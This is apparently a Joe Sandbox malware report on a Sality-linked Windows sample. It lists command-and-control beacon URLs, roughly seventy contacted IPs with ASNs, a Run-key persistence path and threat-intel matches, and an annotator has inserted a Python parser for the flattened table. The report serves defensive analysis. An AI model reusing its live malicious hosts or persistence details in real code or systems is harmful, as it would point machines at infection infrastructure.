        http://padrup.com/sobaka1.gif?1a078ca7=-1238050671 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?18a856f=77566029 | true | | unknown
        http://padrup.com/sobaka1.gif?18285ae2=405297890 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?542972c=882501560 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?12d42dc2=947685702 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?308e5400=-443594752 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?74d2bd=76561250 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?2a895223=713642531 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?2be56550=-1225394912 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?140deb53=-1939771579 | true | | unknown
        http://190.120.227.91:8080/sobakavolos.gif?121e2607=-1559275969 | true | | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                            http://padrup.com/sobaka1.gif?18285ae2=405297890z#jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              https://aefd.nelreports.net/api/report?cat=wsbSearchApp.exe, 0000001E.00000000.2000494937.000001CE189A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                http://kukutrustnet888.info/home.gifSecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                  http://padrup.com/sobaka1.gif?16b31880=-8674435840#Kjvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                    http://kukutrustnet777.info/home.gifSecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bannjvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                        https://login.windows.local/svchost.exe, 00000014.00000000.1740856753.000001697A665000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4039173983.000001697A665000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          unknown
                                                                                                                                                                                                                          http://padrup.com/sobaka1.gif?2924596e=690248046Bjvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                            http://190.120.227.91:8080/sobakavolos.gifSecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1714018983.00000000042DA000.00000004.00000010.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000003.1559539184.000000000089B000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4013785949.0000000000953000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1719947674.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2043123280.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2009490304.00000000013B8000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4054635692.0000000000F7E000.00000040.00000001.01000000.00000009.sdmp, jvauyc32.exe, 00000018.00000002.2148956614.0000000000923000.00000004.10000000.00040000.00000000.sdmp, jvauyc32.exe, 00000018.00000002.2159163080.0000000000F7E000.00000040.00000001.01000000.00000009.sdmpfalse
                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                              https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cjvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gifSecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                  12353VODAFONE-PTVodafonePortugalPTfalse
                                                                                                                                                                                                                                  89.45.96.223
                                                                                                                                                                                                                                  unknownRomania
                                                                                                                                                                                                                                  6910DIALTELECOMROfalse
                                                                                                                                                                                                                                  81.199.91.188
                                                                                                                                                                                                                                  unknownUnited Kingdom
                                                                                                                                                                                                                                  12491IPPLANET-ASILfalse
                                                                                                                                                                                                                                  195.239.22.166
                                                                                                                                                                                                                                  unknownRussian Federation
                                                                                                                                                                                                                                  3216SOVAM-ASRUfalse
                                                                                                                                                                                                                                  115.98.98.230
                                                                                                                                                                                                                                  unknownIndia
                                                                                                                                                                                                                                  17488HATHWAY-NET-APHathwayIPOverCableInternetINfalse
                                                                                                                                                                                                                                  93.81.148.235
                                                                                                                                                                                                                                  unknownRussian Federation
                                                                                                                                                                                                                                  8402CORBINA-ASOJSCVimpelcomRUfalse
                                                                                                                                                                                                                                  85.122.42.91
                                                                                                                                                                                                                                  unknownRomania
                                                                                                                                                                                                                                  8708RCS-RDS73-75DrStaicoviciROfalse
                                                                                                                                                                                                                                  190.111.22.45
                                                                                                                                                                                                                                  unknownGuatemala
                                                                                                                                                                                                                                  26617NavegacomSAGTfalse
                                                                                                                                                                                                                                  203.110.84.90
                                                                                                                                                                                                                                  unknownIndia
                                                                                                                                                                                                                                  23872DELDSLCORE-AS-APdelDSLInternetPvtLtdINfalse
                                                                                                                                                                                                                                  80.178.242.19
                                                                                                                                                                                                                                  unknownIsrael
                                                                                                                                                                                                                                  9116GOLDENLINES-ASNPartnerCommunicationsMainAutonomousSystefalse
                                                                                                                                                                                                                                  84.22.25.227
                                                                                                                                                                                                                                  unknownBulgaria
                                                                                                                                                                                                                                  29667ATLANTISNET-ASBGfalse
                                                                                                                                                                                                                                  188.72.28.186
                                                                                                                                                                                                                                  unknownIraq
                                                                                                                                                                                                                                  49571CELLNET-ASIQfalse
                                                                                                                                                                                                                                  196.20.112.81
                                                                                                                                                                                                                                  unknownAlgeria
                                                                                                                                                                                                                                  36947ALGTEL-ASDZfalse
                                                                                                                                                                                                                                  151.56.26.254
                                                                                                                                                                                                                                  unknownItaly
                                                                                                                                                                                                                                  1267ASN-WINDTREIUNETEUfalse
                                                                                                                                                                                                                                  27.2.3.124
                                                                                                                                                                                                                                  unknownViet Nam
                                                                                                                                                                                                                                  45543SCTV-AS-VNSaiGonTouristcableTelevitionCompanyVNfalse
                                                                                                                                                                                                                                  123.237.94.47
                                                                                                                                                                                                                                  unknownIndia
                                                                                                                                                                                                                                  18101RELIANCE-COMMUNICATIONS-INRelianceCommunicationsLtdDAKCfalse
                                                                                                                                                                                                                                  58.85.93.82
                                                                                                                                                                                                                                  unknownJapan9617ZAQJupiterTelecommunicationsCoLtdJPfalse
                                                                                                                                                                                                                                  78.97.126.19
                                                                                                                                                                                                                                  unknownRomania
                                                                                                                                                                                                                                  6830LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHoldingfalse
                                                                                                                                                                                                                                  94.45.101.168
                                                                                                                                                                                                                                  unknownUkraine
                                                                                                                                                                                                                                  41305FASTIV-ASUAfalse
                                                                                                                                                                                                                                  122.99.102.253
                                                                                                                                                                                                                                  unknownBangladesh
                                                                                                                                                                                                                                  17471CYBERNET-BD-ASGrameenCybernetLtdBangladeshASforlocafalse
                                                                                                                                                                                                                                  188.215.26.241
                                                                                                                                                                                                                                  unknownIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                  57218RIGHTELIRfalse
                                                                                                                                                                                                                                  79.114.248.250
                                                                                                                                                                                                                                  unknownRomania
                                                                                                                                                                                                                                  8708RCS-RDS73-75DrStaicoviciROfalse
                                                                                                                                                                                                                                  41.250.185.19
                                                                                                                                                                                                                                  unknownMorocco
                                                                                                                                                                                                                                  36903MT-MPLSMAfalse
                                                                                                                                                                                                                                  124.125.109.155
                                                                                                                                                                                                                                  unknownIndia
                                                                                                                                                                                                                                  18101RELIANCE-COMMUNICATIONS-INRelianceCommunicationsLtdDAKCfalse
                                                                                                                                                                                                                                  85.204.112.3
                                                                                                                                                                                                                                  unknownItaly
                                                                                                                                                                                                                                  197589ALFANEWSITfalse
                                                                                                                                                                                                                                  14.96.209.63
                                                                                                                                                                                                                                  unknownIndia
                                                                                                                                                                                                                                  4766KIXS-AS-KRKoreaTelecomKRfalse
                                                                                                                                                                                                                                  81.90.238.197
                                                                                                                                                                                                                                  unknownUkraine
                                                                                                                                                                                                                                  25071RADIOCOM-AS69000UkraineZaporozhyeUAfalse
                                                                                                                                                                                                                                  121.243.130.85
                                                                                                                                                                                                                                  unknownIndia
                                                                                                                                                                                                                                  17908TCISLTataCommunicationsINfalse
                                                                                                                                                                                                                                  77.81.224.130
                                                                                                                                                                                                                                  unknownItaly
                                                                                                                                                                                                                                  31034ARUBA-ASNITfalse
                                                                                                                                                                                                                                  93.114.177.116
                                                                                                                                                                                                                                  unknownRomania
                                                                                                                                                                                                                                  51102IMPATT-ASMihaiViteazunr6D3126ROfalse
                                                                                                                                                                                                                                  77.81.232.22
                                                                                                                                                                                                                                  unknownItaly
                                                                                                                                                                                                                                  31034ARUBA-ASNITfalse
                                                                                                                                                                                                                                  89.41.154.115
                                                                                                                                                                                                                                  unknownRomania
                                                                                                                                                                                                                                  6910DIALTELECOMROfalse
                                                                                                                                                                                                                                  123.237.93.73
                                                                                                                                                                                                                                  unknownIndia
                                                                                                                                                                                                                                  18101RELIANCE-COMMUNICATIONS-INRelianceCommunicationsLtdDAKCfalse
                                                                                                                                                                                                                                  78.106.189.148
                                                                                                                                                                                                                                  unknownRussian Federation
                                                                                                                                                                                                                                  8402CORBINA-ASOJSCVimpelcomRUfalse
                                                                                                                                                                                                                                  220.94.117.230
                                                                                                                                                                                                                                  unknownKorea Republic of
                                                                                                                                                                                                                                  4766KIXS-AS-KRKoreaTelecomKRfalse
                                                                                                                                                                                                                                  200.216.212.147
                                                                                                                                                                                                                                  unknownBrazil
                                                                                                                                                                                                                                  7738TelemarNorteLesteSABRfalse
                                                                                                                                                                                                                                  122.169.249.87
                                                                                                                                                                                                                                  unknownIndia
                                                                                                                                                                                                                                  24560AIRTELBROADBAND-AS-APBhartiAirtelLtdTelemediaServicesfalse
                                                                                                                                                                                                                                  58.140.114.152
                                                                                                                                                                                                                                  unknownKorea Republic of
                                                                                                                                                                                                                                  10036CNM-AS-KRDLIVEKRfalse
                                                                                                                                                                                                                                  14.46.86.152
Contacted IPs (continued). Columns: IP | Domain | Country | ASN | ASN name (as printed in the report, with the ASN country code appended) | Malicious

(IP listed above) | unknown | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | false
203.122.23.55 | unknown | India | 10029 | SHYAMSPECTRA-ASSHYAMSPECTRAPVTLTDIN | false
93.114.228.238 | unknown | Spain | 29119 | SERVIHOSTING-ASAireNetworksES | false
77.81.228.77 | unknown | Italy | 31034 | ARUBA-ASNIT | false
190.120.227.91 | unknown | unknown | 270821 | SARAONLINEINFORMATICAEIRELI-MEBR | true
189.35.177.247 | unknown | Brazil | 28573 | CLAROSABR | false
81.180.90.149 | unknown | Romania | 47427 | DTNETWOKRO | false
188.26.1.21 | unknown | Romania | 8708 | RCS-RDS73-75DrStaicoviciRO | false
183.83.188.123 | unknown | India | 131269 | BEAMTELE-AS-APACTFIBERNETPvtLtdIN | false
193.140.107.175 | unknown | Turkey | 8517 | ULAKNETTR | false
31.140.4.130 | unknown | Turkey | 16135 | TURKCELL-ASTurkcellASTR | false
211.107.173.111 | unknown | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | false
27.3.6.5 | unknown | Viet Nam | 45543 | SCTV-AS-VNSaiGonTouristcableTelevitionCompanyVN | false
124.123.112.184 | unknown | India | 18209 | BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdIN | false
93.94.54.35 | unknown | Iraq | 60227 | CONTACTLABIT | false
178.123.176.220 | unknown | Belarus | 6697 | BELPAK-ASBELPAKBY | false
189.12.181.188 | unknown | Brazil | 7738 | TelemarNorteLesteSABR | false
109.124.19.10 | unknown | Russian Federation | 34145 | TOMTELRU | false
187.13.32.46 | unknown | Brazil | 7738 | TelemarNorteLesteSABR | false
195.42.129.188 | unknown | Romania | 44605 | TELECABLU-ASNRO | false
217.219.117.8 | unknown | Iran (Islamic Republic of) | 58224 | TCIIR | false
89.34.124.109 | unknown | United Kingdom | 209706 | NOOPUpstreamAS41108DE | false
183.82.146.144 | unknown | India | 18209 | BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdIN | false
90.148.247.149 | unknown | Saudi Arabia | 25019 | SAUDINETSTC-ASSA | false
113.190.137.239 | unknown | Viet Nam | 45899 | VNPT-AS-VNVNPTCorpVN | false
83.222.184.130 | unknown | Bulgaria | 43561 | NET1-ASBG | false
187.0.231.113 | unknown | Brazil | 28242 | NOLVERINFORMATICALTDABR | false
85.186.185.172 | unknown | Romania | 6830 | LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding | false
189.43.156.4 | unknown | Brazil | 4230 | CLAROSABR | false
178.233.92.89 | unknown | Turkey | 47524 | TURKSAT-ASTR | false
77.81.225.89 | unknown | Italy | 31034 | ARUBA-ASNIT | false
121.135.15.57 | unknown | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | false
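When this report is exported as text, the contacted-IP table loses its column separators and every row arrives as three lines: the IP, the domain with the country name glued on, and the ASN number with the ASN name and the Malicious flag glued on. The Python below is an example added here; it is not part of the Joe Sandbox report or its tooling. It turns that flattened text back into records and pulls out what a responder wants from such a list: the addresses the sandbox flagged as malicious, and the ASNs that recur across the peer list. The sample rows are copied from this report; the record layout, the `Contact` class and the way the domain is separated from the country are my assumptions about the flattened format (that split only works when the domain column reads "unknown", as it does for every row on this page).

```python
"""Recover structured records from the flattened 'contacted IPs' rows of a Joe Sandbox text export."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample: four rows copied from this report, in the flattened 3-lines-per-row form.
SAMPLE = """\
190.120.227.91
unknownunknown
270821SARAONLINEINFORMATICAEIRELI-MEBRtrue
189.35.177.247
unknownBrazil
28573CLAROSABRfalse
77.81.228.77
unknownItaly
31034ARUBA-ASNITfalse
77.81.225.89
unknownItaly
31034ARUBA-ASNITfalse
"""

IP_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
# ASN number, then the ASN name (country code still glued on), then the Malicious flag.
ASN_RE = re.compile(r"^(\d+)(.*?)(true|false)$")


@dataclass(frozen=True)
class Contact:  # hypothetical record type, not a Joe Sandbox structure
    ip: str
    domain: str
    country: str
    asn: int
    asn_name: str
    malicious: bool


def parse_contacts(text: str) -> List[Contact]:
    """Slide a 3-line window over the text; accept a window only if line 1 is an IPv4
    address and line 3 matches the ASN/name/flag pattern, so stray lines are skipped."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    contacts: List[Contact] = []
    i = 0
    while i + 2 < len(lines):
        ip, dom_country, asn_line = lines[i:i + 3]
        m = ASN_RE.match(asn_line)
        if not IP_RE.match(ip) or m is None:
            i += 1  # not the start of a row; advance one line and retry
            continue
        # The report prints "unknown" as the domain when nothing resolved and the country
        # follows with no separator; "unknownunknown" means the country is unknown too.
        if dom_country.startswith("unknown"):
            domain = "unknown"
            country = dom_country[len("unknown"):] or "unknown"
        else:
            domain, country = "", dom_country  # assumption: resolved names are not split further
        contacts.append(Contact(ip, domain, country, int(m.group(1)), m.group(2), m.group(3) == "true"))
        i += 3
    return contacts


def malicious_ips(contacts: List[Contact]) -> List[str]:
    """Addresses carrying the report's Malicious=true flag, deduplicated and sorted."""
    return sorted({c.ip for c in contacts if c.malicious})


def asn_counts(contacts: List[Contact]) -> List[Tuple[int, int]]:
    """ASNs ordered by how many contacted peers they host."""
    return Counter(c.asn for c in contacts).most_common()


if __name__ == "__main__":
    recs = parse_contacts(SAMPLE)
    print(f"{len(recs)} contacts parsed")
    print("flagged malicious:", malicious_ips(recs))
    print("peers per ASN:", asn_counts(recs))
```

Two points worth noting when using the output. The Malicious flag is the sandbox's verdict on the address, not evidence about which peers the sample actually spoke to: on this page only one of the thirty-odd contacted addresses carries it, so a blocklist built from flagged rows alone would cover one peer and miss the rest. And the ASN name column keeps the two-letter ASN country code fused to the end of the name, because the export gives no reliable separator; it is left as printed rather than guessed.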
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1536957
Start date and time: 2024-10-18 12:40:14 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 13m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 27
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
Detection: MAL
Classification: mal100.spre.phis.troj.evad.winEXE@17/49@220/100
EGA Information:
• Successful, ratio: 30%
HCA Information:
• Successful, ratio: 54%
• Number of executed functions: 125
• Number of non-executed functions: 85
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 40.126.32.133, 40.126.32.74, 40.126.32.136, 40.126.32.76, 40.126.32.140, 40.126.32.134, 20.190.160.14, 20.190.160.20
• Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
• Execution Graph export aborted for target jvauyc32.exe, PID 7732 because there are no executed functions
• Execution Graph export aborted for target sedSmibSjDOiaD.exe, PID 3332 because it is empty
• Execution Graph export aborted for target sedSmibSjDOiaD.exe, PID 3440 because it is empty
• Execution Graph export aborted for target sedSmibSjDOiaD.exe, PID 5796 because it is empty
• Execution Graph export aborted for target sedSmibSjDOiaD.exe, PID 6876 because it is empty
• Execution Graph export aborted for target sedSmibSjDOiaD.exe, PID 7000 because it is empty
• Execution Graph export aborted for target sedSmibSjDOiaD.exe, PID 7140 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big: too many NtDeleteValueKey calls found
                                                                                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                                                                                  • VT rate limit hit for: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
Time     | Type            | Description
06:41:29 | API Interceptor | 103x Sleep call for process: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe modified
06:41:35 | API Interceptor | 199425x Sleep call for process: jvauyc32.exe modified
06:42:00 | API Interceptor | 1825x Sleep call for process: explorer.exe modified
06:45:12 | API Interceptor | 751x Sleep call for process: sedSmibSjDOiaD.exe modified
11:41:47 | Autostart       | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run jvauyc32.exe C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Match (IP)      | Associated Sample Name / URL                        | Detection | Threat Name
113.21.72.31    | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm
113.21.72.31    | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe    | malicious | Sality
58.72.195.130   | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm
58.72.195.130   | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe    | malicious | Sality
195.144.14.69   | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm
195.144.14.69   | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe    | malicious | Sality
58.147.170.86   | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm
58.147.170.86   | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe    | malicious | Sality
189.56.86.165   | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm
189.56.86.165   | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe    | malicious | Sality
183.82.176.250  | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm
183.82.176.250  | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe    | malicious | Sality
115.119.58.98   | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm
115.119.58.98   | PfBjDhHzvV.exe                                      | malicious | Metasploit, Sality
115.119.58.98   | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe    | malicious | Sality
94.55.239.88    | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm
94.55.239.88    | PfBjDhHzvV.exe                                      | malicious | Metasploit, Sality
94.55.239.88    | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe    | malicious | Sality
178.22.169.142  | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm
178.22.169.142  | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe    | malicious | Sality
Match (domain)            | Associated Sample Name / URL                        | Detection | Threat Name        | Context (resolved IP)
ns1.random.dns.d0wn.biz   | QKbQPleggp.exe                                      | malicious | Unknown            | 178.17.170.133
padrup.com                | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm      | 185.53.178.50
padrup.com                | PfBjDhHzvV.exe                                      | malicious | Metasploit, Sality | 185.53.178.50
padrup.com                | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe    | malicious | Sality             | 185.53.178.50
padrup.com                | http://padrup.com/sobaka1.gif?51edc42=601359822     | malicious | Unknown            | 206.189.61.126
padrup.com                | TzIxyOFL2Y.exe                                      | malicious | Sality             | 206.189.61.126
padrup.com                | iwV2wYLBqJ.exe                                      | malicious | Unknown            | 206.189.61.126
Match (ASN)                       | Associated Sample Name / URL                        | Detection | Threat Name        | Context (IP)
AFTABIT-BD-AS-APAftabITLimitedBD  | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm      | 58.147.170.86
AFTABIT-BD-AS-APAftabITLimitedBD  | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe    | malicious | Sality             | 58.147.170.86
AFTABIT-BD-AS-APAftabITLimitedBD  | sora.x86.elf                                        | malicious | Unknown            | 223.27.90.88
AFTABIT-BD-AS-APAftabITLimitedBD  | se4VlnSbIO.elf                                      | malicious | Unknown            | 223.27.90.78
AFTABIT-BD-AS-APAftabITLimitedBD  | iZYqP2K1UC.elf                                      | malicious | Mirai              | 223.27.89.35
AFTABIT-BD-AS-APAftabITLimitedBD  | arm.elf                                             | malicious | Mirai              | 223.27.89.39
AFTABIT-BD-AS-APAftabITLimitedBD  | BYt7FtL3j5.elf                                      | malicious | Unknown            | 223.27.89.26
AFTABIT-BD-AS-APAftabITLimitedBD  | SecuriteInfo.com.Linux.Mirai.4373.26297.22503.elf   | malicious | Unknown            | 223.27.90.32
AFTABIT-BD-AS-APAftabITLimitedBD  | sora.arm.elf                                        | malicious | Mirai              | 223.27.90.26
AFTABIT-BD-AS-APAftabITLimitedBD  | xd.x86.elf                                          | malicious | Mirai              | 223.27.90.27
LGDACOMLGDACOMCorporationKR       | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm      | 58.72.195.130
LGDACOMLGDACOMCorporationKR       | mirai.ppc.elf                                       | malicious | Mirai              | 211.40.138.211
LGDACOMLGDACOMCorporationKR       | mirai.mips.elf                                      | malicious | Mirai              | 1.211.159.140
LGDACOMLGDACOMCorporationKR       | wxy6cQKIqG.exe                                      | malicious | SmokeLoader        | 211.171.233.126
LGDACOMLGDACOMCorporationKR       | powerpc.elf                                         | malicious | Unknown            | 106.242.92.173
LGDACOMLGDACOMCorporationKR       | spc.elf                                             | malicious | Mirai              | 112.218.246.209
LGDACOMLGDACOMCorporationKR       | armv7l.elf                                          | malicious | Unknown            | 58.73.233.145
LGDACOMLGDACOMCorporationKR       | armv7l.elf                                          | malicious | Unknown            | 61.41.202.130
LGDACOMLGDACOMCorporationKR       | sh4.elf                                             | malicious | Mirai              | 203.233.183.177
LGDACOMLGDACOMCorporationKR       | mips.elf                                            | malicious | Mirai              | 1.216.113.98
STEALTH-ASUA                      | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm      | 195.144.14.69
STEALTH-ASUA                      | SecuriteInfo.com.Win32.Sector.30.19697.26848.exe    | malicious | Sality             | 195.144.14.69
STEALTH-ASUA                      | kz7iLmqRuq.exe                                      | malicious | Quasar             | 91.247.92.63
TELEFONICABRASILSABR              | n5h5BaL8q0.exe                                      | malicious | Sality, XWorm      | 189.56.86.165
TELEFONICABRASILSABR              | mirai.mips.elf                                      | malicious | Mirai              | 201.28.100.136
TELEFONICABRASILSABR              | mirai.spc.elf                                       | malicious | Mirai              | 187.34.116.163
TELEFONICABRASILSABR              | EMnyl2klUV.elf                                      | malicious | Mirai              | 179.129.231.190
TELEFONICABRASILSABR              | Q137zuCNxh.elf                                      | malicious | Mirai              |
                                                                                                                                                                                                                                                                          • 179.168.142.125
                                                                                                                                                                                                                                                                          botnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                                          • 201.43.115.149
                                                                                                                                                                                                                                                                          botnet.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                                          • 179.100.203.170
                                                                                                                                                                                                                                                                          botnet.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                                                          • 191.11.223.95
                                                                                                                                                                                                                                                                          armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 177.114.154.16
                                                                                                                                                                                                                                                                          arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 189.78.86.102
                                                                                                                                                                                                                                                                          WISHNET-AS-APWISHNETPRIVATELIMITEDINn5h5BaL8q0.exeGet hashmaliciousSality, XWormBrowse
                                                                                                                                                                                                                                                                          • 113.21.72.31
                                                                                                                                                                                                                                                                          armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 223.223.131.44
                                                                                                                                                                                                                                                                          arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                          • 45.250.59.193
                                                                                                                                                                                                                                                                          na.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                                                                                          • 103.214.137.247
                                                                                                                                                                                                                                                                          SecuriteInfo.com.Win32.Sector.30.19697.26848.exeGet hashmaliciousSalityBrowse
                                                                                                                                                                                                                                                                          • 113.21.72.31
                                                                                                                                                                                                                                                                          jew.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 223.223.155.251
                                                                                                                                                                                                                                                                          VKkfiTAZXP.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                                                                                          • 103.214.137.243
                                                                                                                                                                                                                                                                          wget.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                                                                                          • 103.214.137.251
                                                                                                                                                                                                                                                                          jew.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          • 223.223.155.226
                                                                                                                                                                                                                                                                          dVbrHqaCf1.elfGet hashmaliciousGafgytBrowse
                                                                                                                                                                                                                                                                          • 103.214.137.240
